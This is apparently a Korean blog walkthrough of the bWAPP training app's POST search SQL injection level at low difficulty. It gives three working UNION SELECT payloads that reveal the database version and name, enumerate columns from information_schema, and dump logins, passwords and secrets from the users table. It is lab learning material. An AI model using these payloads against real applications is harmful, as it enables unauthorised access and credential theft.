기본 콘텐츠로 건너뛰기

bWAPP SQL Injection [ POST/Search ]

bWAPP SQL Injection [ POST/Search ] Current : low




 Search를 눌러 문제페이지를 분석해보면 아래와 같이 POST방식으로 URL에 매개변수를 노출하고 있지 않습니다.
  



따라서 Search 를 눌러 패킷을 잡고 분석해본 결과 아래와 같이 title변수와 , action  변수가 노출됩니다.



따라서 아래와 같이 1' UNION ALL SELECT 1,@@version,3,4,database(),6,7#문을 이용하여 데이터베이스의 정보를 확인합니다.





확인 결과 아래와 같이 버전과 , 데이터베이스 이름이 노출됩니다.





1' UNION ALL SELECT 1,column_name,3,4,5,6,7 from information_schema.columns# 를 통해 칼럼명을 알아냅니다.




알아낸 결과 아래와 같이 id , login , password , email , secret ,email 등 다양한 데이터 정보가 노출됩니다.  

 



이를 통해 1' UNION ALL SELECT 1,password,login,secret,5,6,7 from users#문을 통해 중요 정보를 알아낼수있습니다.













댓글